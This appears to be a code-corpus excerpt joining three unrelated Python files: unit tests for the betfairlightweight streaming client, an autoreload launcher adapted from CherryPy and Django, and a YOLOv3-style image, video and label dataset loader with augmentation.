assert self.betfair_stream.session_token == self.session_token
assert self.betfair_stream.timeout == self.timeout
assert self.betfair_stream.buffer_size == self.buffer_size
assert self.betfair_stream.host == "stream-api.betfair.com"
assert self.betfair_stream.receive_count == 0
assert self.betfair_stream.datetime_last_received is None
assert self.betfair_stream._socket is None
assert self.betfair_stream._running is False
def test_host_init(self):
betfair_stream = BetfairStream(
self.unique_id,
self.mock_listener,
self.app_key,
self.session_token,
self.timeout,
self.buffer_size,
"integration",
)
assert betfair_stream.host == "stream-api-integration.betfair.com"
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.authenticate")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._connect")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._read_loop")
def test_start(self, mock_read_loop, mock_connect, mock_authenticate):
self.betfair_stream._running = True
self.betfair_stream.start()
mock_read_loop.assert_called_with()
self.betfair_stream._running = False
self.betfair_stream.start()
mock_connect.assert_called_with()
mock_authenticate.assert_called_with()
@mock.patch(
"betfairlightweight.streaming.betfairstream.BetfairStream._create_socket"
)
def test_connect(self, mock_create_socket):
self.betfair_stream._connect()
assert self.betfair_stream._running is True
mock_create_socket.assert_called_with()
def test_stop(self):
self.betfair_stream.stop()
assert self.betfair_stream._running is False
assert self.betfair_stream._socket is None
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_authenticate(self, mock_send):
self.betfair_stream.authenticate()
mock_send.assert_called_with(
{
"id": self.betfair_stream._unique_id,
"appKey": self.app_key,
"session": self.session_token,
"op": "authentication",
}
)
self.betfair_stream.authenticate()
mock_send.assert_called_with(
{
"id": self.betfair_stream._unique_id,
"appKey": self.app_key,
"session": self.session_token,
"op": "authentication",
}
)
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_heartbeat(self, mock_send):
self.betfair_stream.heartbeat()
mock_send.assert_called_with(
{"id": self.betfair_stream._unique_id, "op": "heartbeat"}
)
self.betfair_stream.heartbeat()
mock_send.assert_called_with(
{"id": self.betfair_stream._unique_id, "op": "heartbeat"}
)
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_subscribe_to_markets(self, mock_send):
market_filter = {"test": 123}
market_data_filter = {"another_test": 123}
self.betfair_stream.subscribe_to_markets(
market_filter,
market_data_filter,
heartbeat_ms=1,
conflate_ms=2,
segmentation_enabled=False,
)
mock_send.assert_called_with(
{
"op": "marketSubscription",
"marketFilter": market_filter,
"id": self.betfair_stream._unique_id,
"marketDataFilter": market_data_filter,
"initialClk": None,
"clk": None,
"heartbeatMs": 1,
"conflateMs": 2,
"segmentationEnabled": False,
}
)
self.mock_listener.register_stream.assert_called_with(
self.betfair_stream._unique_id, "marketSubscription"
)
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_resubscribe_to_markets(self, mock_send):
market_filter = {"test": 123}
market_data_filter = {"another_test": 123}
initial_clk = "abcdef"
clk = "abc"
self.betfair_stream.subscribe_to_markets(
market_filter,
market_data_filter,
initial_clk,
clk,
heartbeat_ms=1,
conflate_ms=2,
segmentation_enabled=False,
)
mock_send.assert_called_with(
{
"op": "marketSubscription",
"marketFilter": market_filter,
"id": self.betfair_stream._unique_id,
"marketDataFilter": market_data_filter,
"initialClk": initial_clk,
"clk": clk,
"heartbeatMs": 1,
"conflateMs": 2,
"segmentationEnabled": False,
}
)
assert not self.mock_listener.register_stream.called
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_subscribe_to_orders(self, mock_send):
initial_clk = "abcdef"
clk = "abc"
self.betfair_stream.subscribe_to_orders(
initial_clk, clk, heartbeat_ms=1, conflate_ms=2, segmentation_enabled=False
)
mock_send.assert_called_with(
{
"orderFilter": "abcdef",
"id": self.betfair_stream._unique_id,
"op": "orderSubscription",
"initialClk": "abc",
"clk": None,
"heartbeatMs": 1,
"conflateMs": 2,
"segmentationEnabled": False,
}
)
self.mock_listener.register_stream.assert_called_with(
self.betfair_stream._unique_id, "orderSubscription"
)
@mock.patch("ssl.wrap_socket")
@mock.patch("socket.socket")
def test_create_socket(self, mock_socket, mock_wrap_socket):
self.betfair_stream._create_socket()
mock_socket.assert_called_with(socket.AF_INET, socket.SOCK_STREAM)
assert mock_wrap_socket.call_count == 1
@mock.patch(
"betfairlightweight.streaming.betfairstream.BetfairStream._data",
return_value=False,
)
@mock.patch(
"betfairlightweight.streaming.betfairstream.BetfairStream._receive_all",
return_value="{}\r\n",
)
def test_read_loop(self, mock_receive_all, mock_data):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
threading.Thread(target=self.betfair_stream._read_loop).start()
for i in range(0, 2):
time.sleep(0.1)
self.betfair_stream._running = False
time.sleep(0.1)
mock_data.assert_called_with("{}")
mock_receive_all.assert_called_with()
assert self.betfair_stream.datetime_last_received is not None
assert self.betfair_stream.receive_count > 0
def test_receive_all(self):
mock_socket = mock.Mock()
data_return_value = b'{"op":"status"}\r\n'
mock_socket.recv.return_value = data_return_value
self.betfair_stream._socket = mock_socket
data = self.betfair_stream._receive_all()
assert data == ""
self.betfair_stream._running = True
data = self.betfair_stream._receive_all()
mock_socket.recv.assert_called_with(self.buffer_size)
assert data == data_return_value.decode("utf-8")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_receive_all_closed(self, mock_stop):
mock_socket = mock.Mock()
data_return_value = b""
mock_socket.recv.return_value = data_return_value
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
with self.assertRaises(SocketError):
self.betfair_stream._receive_all()
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_receive_all_error(self, mock_stop):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
mock_socket.recv.side_effect = socket.error()
with self.assertRaises(SocketError):
self.betfair_stream._receive_all()
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_receive_all_timeout(self, mock_stop):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
mock_socket.recv.side_effect = socket.timeout()
with self.assertRaises(SocketError):
self.betfair_stream._receive_all()
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_data(self, mock_stop):
received_data = {"op": "status"}
with self.assertRaises(ListenerError):
self.betfair_stream._data(received_data)
self.mock_listener.on_data.assert_called_with(received_data)
assert mock_stop.called
self.mock_listener.on_data.return_value = True
self.betfair_stream._data(received_data)
self.mock_listener.on_data.assert_called_with(received_data)
assert mock_stop.call_count == 1
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.authenticate")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._connect")
def test_send(self, mock_connect, mock_authenticate):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
message = {"message": 1}
self.betfair_stream._send(message)
assert mock_connect.call_count == 1
assert mock_authenticate.call_count == 1
assert mock_socket.sendall.call_count == 1
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_send_timeout(self, mock_stop):
self.betfair_stream._running = True
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
mock_socket.sendall.side_effect = socket.timeout()
message = {"message": 1}
with self.assertRaises(SocketError):
self.betfair_stream._send(message)
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_send_error(self, mock_stop):
self.betfair_stream._running = True
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
mock_socket.sendall.side_effect = socket.error()
message = {"message": 1}
with self.assertRaises(SocketError):
self.betfair_stream._send(message)
mock_stop.assert_called_with()
def test_repr(self):
assert repr(self.betfair_stream) == "<BetfairStream>"
def test_str(self):
assert str(self.betfair_stream) == "<BetfairStream [not running]>"
self.betfair_stream._running = True
assert str(self.betfair_stream) == "<BetfairStream [running]>"
class HistoricalStreamTest(unittest.TestCase):
def setUp(self):
self.directory = "tests/resources/historicaldata/BASIC-1.132153978"
self.listener = mock.Mock()
self.stream = HistoricalStream(self.directory, self.listener)
def test_init(self):
assert self.stream.directory == self.directory
assert self.stream.listener == self.listener
assert self.stream._running is False
@mock.patch("betfairlightweight.endpoints.streaming.HistoricalStream._read_loop")
def test_start(self, mock_read_loop):
self.stream.start()
mock_read_loop.assert_called_with()
assert self.stream._running is True
def test_stop(self):
self.stream._running = True
self.stream.stop()
assert self.stream._running is False
@mock.patch("betfairlightweight.streaming.betfairstream.HistoricalStream.stop")
def test__read_loop(self, mock_stop):
self.stream._running = True
self.stream._read_loop()
self.assertEqual(self.listener.on_data.call_count, 480)
self.listener.on_data.snap()
mock_stop.assert_called_with()
self.assertTrue(self.stream._running)
class HistoricalGeneratorStreamTest(unittest.TestCase):
def setUp(self):
self.directory = "tests/resources/historicaldata/BASIC-1.132153978"
self.listener = mock.Mock()
self.stream = HistoricalGeneratorStream(self.directory, self.listener)
def test_init(self):
assert self.stream.directory == self.directory
assert self.stream.listener == self.listener
assert self.stream._running is False
@mock.patch(
"betfairlightweight.streaming.betfairstream.HistoricalGeneratorStream._read_loop"
)
def test_get_generator(self, mock_read_loop):
self.assertEqual(self.stream.get_generator(), mock_read_loop)
@mock.patch(
"betfairlightweight.streaming.betfairstream.HistoricalGeneratorStream.stop"
)
def test__read_loop(self, mock_stop):
data = [i for i in self.stream._read_loop()]
self.assertEqual(len(data), 480)
self.assertEqual(self.listener.on_data.call_count, 480)
self.listener.on_data.snap()
mock_stop.assert_called_with()
self.assertTrue(self.stream._running)
|
autoreload.py
|
# Autoreloading launcher.
# Borrowed from Peter Hunt and the CherryPy project (http://www.cherrypy.org).
# Some taken from Ian Bicking's Paste (http://pythonpaste.org/).
#
# Borrowed from Django and adapted for Cyrax.
#
# Portions copyright (c) 2004, CherryPy Team (team@cherrypy.org)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the CherryPy Team nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os, sys, time
import logging
from threading import Thread
logger = logging.getLogger(__name__)
RUN_RELOADER = True
_mtimes = {}
_win = (sys.platform == "win32")
def normpath(p):
return os.path.normpath(os.path.abspath(p))
def _should_ignore(path, exclude):
root, subpart = os.path.split(path)
if root == path:
# reached the /
return False
for exc in exclude:
if normpath(path) == normpath(exc):
return True
return _should_ignore(root, exclude)
def _get_mtime(path):
try:
stat = os.stat(path)
except OSError:
return None
mtime = stat.st_mtime
if _win:
mtime -= stat.st_ctime
return mtime
def source_changed(path, exclude=None):
global _mtimes
if exclude is None:
exclude = []
for root, dirs, files in os.walk(path):
if _should_ignore(root, exclude):
continue
for filename in files:
filepath = os.path.join(root, filename)
mtime = _get_mtime(filepath)
if filepath not in _mtimes:
_mtimes[filepath] = mtime
continue
if mtime != _mtimes[filepath]:
logger.debug('File %r is changed', filepath)
_mtimes = {}
return True
return False
def reloader_thread(source, dest):
while RUN_RELOADER:
if source_changed(source, exclude=[dest]):
logger.info('Source changed, restarting')
sys.exit(3) # force reload
time.sleep(1)
def restart_with_reloader():
while True:
args = [sys.executable] + sys.argv
if sys.platform == "win32":
args = ['"%s"' % arg for arg in args]
new_environ = os.environ.copy()
new_environ["RUN_MAIN"] = 'true'
exit_code = os.spawnve(os.P_WAIT, sys.executable, args, new_environ)
if exit_code != 3:
return exit_code
def reloader(main_func, args, kwargs):
if os.environ.get("RUN_MAIN") == "true":
Thread(target=main_func, args=args, kwargs=kwargs).start()
try:
reloader_thread(kwargs['source'], kwargs['dest'])
except KeyboardInterrupt:
pass
else:
try:
sys.exit(restart_with_reloader())
except KeyboardInterrupt:
pass
def main(main_func, args=None, kwargs=None):
if args is None:
args = ()
if kwargs is None:
kwargs = {}
reloader(main_func, args, kwargs)
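# Example usage (a minimal sketch, not part of the original module): `build_site`,
# "src" and "out" are hypothetical names. `main_func` must accept the same kwargs
# that the reloader thread uses to watch `source` and to exclude `dest` from the scan.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    def build_site(source, dest):
        logger.info("building %s -> %s", source, dest)
        # ... write generated output into `dest` here ...
    main(build_site, kwargs={"source": "src", "dest": "out"})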
|
datasets.py
|
import os
import time
import glob
import math
import random
import shutil
import numpy as np
from tqdm import tqdm
from pathlib import Path
from threading import Thread
import cv2
from PIL import Image, ExifTags
import torch
from torch.utils.data import Dataset
from .helpers.utils import (
xyxy2xywh,
xywh2xyxy,
)
help_url = "https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data"
img_formats = [".bmp", ".jpg", ".jpeg", ".png", ".tif", ".dng"]
vid_formats = [".mov", ".avi", ".mp4"]
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == "Orientation":
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, "*.*")))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = "images"
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, "No images or videos found in " + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = "video"
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(
"video %g/%g (%g/%g) %s: "
% (self.count + 1, self.nF, self.frame, self.nframes, path),
end="",
)
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, "Image Not Found " + path
print("image %g/%g %s: " % (self.count, self.nF, path), end="")
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
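# Typical inference usage (a sketch; "data/samples" is a hypothetical path):
#     for path, img, img0, vid_cap in LoadImages("data/samples", img_size=416):
#         tensor = torch.from_numpy(img).float() / 255.0  # CHW, RGB, 0.0-1.0
#         ...run the model on tensor...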
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == "0":
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord("q"): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, "Camera Error %s" % self.pipe
img_path = "webcam.jpg"
print("webcam %g: " % self.count, end="")
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources="streams.txt", img_size=416):
self.mode = "images"
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, "r") as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print("%g/%g: %s... " % (i + 1, n, s), end="")
cap = cv2.VideoCapture(0 if s == "0" else s)
assert cap.isOpened(), "Failed to open %s" % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=(i, cap), daemon=True)
print(" success (%gx%g at %.2f FPS)." % (w, h, fps))
thread.start()
print("") # newline
# check for common shapes
s = np.stack(
[letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0
) # inference shapes
self.rect = (
np.unique(s, axis=0).shape[0] == 1
) # rect inference if all shapes equal
if not self.rect:
print(
"WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams."
)
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord("q"): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [
letterbox(
x, new_shape=self.img_size, auto=self.rect, interp=cv2.INTER_LINEAR
)[0]
for x in img0
]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(
self,
path,
img_size=416,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_labels=True,
cache_images=False,
single_cls=False,
):
path = str(Path(path)) # os-agnostic
assert os.path.isfile(path), "File not found %s. See %s" % (path, help_url)
with open(path, "r") as f:
self.img_files = [
x.replace("/", os.sep)
for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats
]
n = len(self.img_files)
assert n > 0, "No images found in %s. See %s" % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index (np.int is removed in NumPy >= 1.24)
nb = bi[-1] + 1 # number of batches
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = (
self.augment and not self.rect
) # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [
x.replace("images", "labels").replace(os.path.splitext(x)[-1], ".txt")
for x in self.img_files
]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes (wh)
sp = path.replace(".txt", ".shapes") # shapefile path
try:
with open(sp, "r") as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, "Shapefile out of sync"
except Exception:
s = [
exif_size(Image.open(f))
for f in tqdm(self.img_files, desc="Reading image shapes")
]
np.savetxt(sp, s, fmt="%g") # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()  # indices that sort images by aspect ratio
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect]  # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = (
np.ceil(np.array(shapes) * img_size / 32.0).astype(int) * 32
)
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc="Caching labels")
nm, nf, ne, ns, nd = (
0,
0,
0,
0,
0,
) # number missing, found, empty, datasubset, duplicate
for i, file in enumerate(pbar):
try:
with open(file, "r") as f:
l = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
)
except Exception:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, "> 5 label columns: %s" % file
assert (l >= 0).all(), "negative labels: %s" % file
assert (l[:, 1:] <= 1).all(), (
"non-normalized or out of bounds coordinate labels: %s" % file
)
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1e4:
if ns == 0:
create_folder(path="./datasubset")
os.makedirs("./datasubset/images")
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open("./datasubset/images.txt", "a") as f:
f.write(self.img_files[i] + "\n")
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = "%s%sclassifier%s%g_%g_%s" % (
p.parent.parent,
os.sep,
os.sep,
x[0],
j,
p.name,
)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(
b[[0, 2]], 0, w
) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(
f, img[b[1] : b[3], b[0] : b[2]]
), "Failure extracting classifier boxes"
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = (
"Caching labels (%g found, %g missing, %g empty, %g duplicate, for %g images)"
% (nf, nm, ne, nd, n)
)
assert nf > 0, "No labels found. See %s" % help_url
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc="Caching images")
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(
self, i
) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = "Caching images (%.1fGB)" % (gb / 1e9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc="Detecting corrupted images"):
try:
_ = io.imread(file)
except Exception:
print("Corrupted image detected: %s" % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = (
self.batch_shapes[self.batch[index]] if self.rect else self.img_size
) # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, "r") as f:
x = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = (
ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]
) # pad width
labels[:, 2] = (
ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]
) # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(
img,
labels,
degrees=hyp["degrees"],
translate=hyp["translate"],
scale=hyp["scale"],
shear=hyp["shear"],
)
# Augment colorspace
augment_hsv(img, hgain=hyp["hsv_h"], sgain=hyp["hsv_s"], vgain=hyp["hsv_v"])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, img_path, shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
img_path = self.img_files[index]
img = cv2.imread(img_path) # BGR
assert img is not None, "Image Not Found " + img_path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r < 1 or (
self.augment and (r != 1)
): # always resize down, only resize up if training with augmentation
interp = (
cv2.INTER_LINEAR if self.augment else cv2.INTER_AREA
) # LINEAR for training, AREA for testing
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return (
self.imgs[index],
self.img_hw0[index],
self.img_hw[index],
) # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
x = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
img_hsv = (
(cv2.cvtColor(img, cv2.COLOR_BGR2HSV) * x).clip(None, 255).astype(np.uint8)
)
np.clip(
